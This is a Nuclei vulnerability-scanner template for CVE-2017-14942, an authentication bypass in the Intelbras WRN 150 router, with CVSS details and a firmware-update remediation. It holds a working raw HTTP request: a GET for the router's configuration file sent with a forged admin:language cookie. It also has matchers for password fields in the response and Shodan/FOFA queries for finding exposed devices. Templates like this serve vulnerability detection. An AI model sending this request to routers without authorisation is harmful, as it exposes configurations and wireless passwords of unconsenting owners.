漏洞描述
Intelbras WRN 150 router is vulnerable to authentication bypass through cookie manipulation. An attacker can bypass authentication and download the router configuration file by manipulating the admin:language cookie.
id: CVE-2017-14942
info:
name: Intelbras WRN 150 - Authentication Bypass
author: ritikchaddha
severity: critical
description: |
Intelbras WRN 150 router is vulnerable to authentication bypass through cookie manipulation. An attacker can bypass authentication and download the router configuration file by manipulating the admin:language cookie.
remediation: |
Update the router firmware to the latest version.
reference:
- https://www.exploit-db.com/exploits/42916
- https://nvd.nist.gov/vuln/detail/CVE-2017-14942
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-14942
cwe-id: CWE-552
epss-score: 0.00986
epss-percentile: 0.76024
cpe: cpe:2.3:h:intelbras:wrn150:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: intelbras
product: wrn150
shodan-query: html:"WRN150"
fofa-query: title="WRN150"
tags: cve,cve2017,intelbras,auth-bypass,router
http:
- raw:
- |
GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.1
Host: {{Hostname}}
Cookie: admin:language=pt
matchers:
- type: dsl
dsl:
- "contains(content_type, 'config/conf')"
- "contains_all(body, 'wl_', '_passwd')"
- "status_code==200"
condition: and
# digest: 490a00463044022045fb68823c708f8b1f612e2cfa9b644c6ffd12adb98eea254f10c7413a92ab0d02207a7d87fe0689545901e8274d7b56d9e881497424dfed547f1e57fefc928c8420:922c64590222798bb761d5b6d8e72950